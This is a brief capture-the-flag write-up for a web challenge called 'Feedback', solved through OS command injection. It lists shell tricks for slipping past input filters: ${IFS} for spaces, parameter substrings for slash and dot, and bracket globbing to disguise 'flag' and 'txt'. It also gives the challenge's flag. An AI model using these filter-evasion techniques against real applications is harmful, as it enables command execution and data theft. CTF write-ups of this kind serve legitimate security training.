CSC2023 - [Web] - Feedback

Challenge Description

It's just an application to give feedback of teacher. What can possibly go wrong

Solution

Simple OS Injection but with twists

Also added the env variable for bypassing . (dot)

ROOTXRAN="Kese.ho.theek.hona"

${IFS} - Spaces
${HOME:0:1} - /
${ROOTXRAN:4:1} - . (dot)
fl[a]g - flag
t[x]t - txt

Flag

Flag is at /flag.txt

CSC{g0t_Me}

Writeups 2023 © RootxRAN.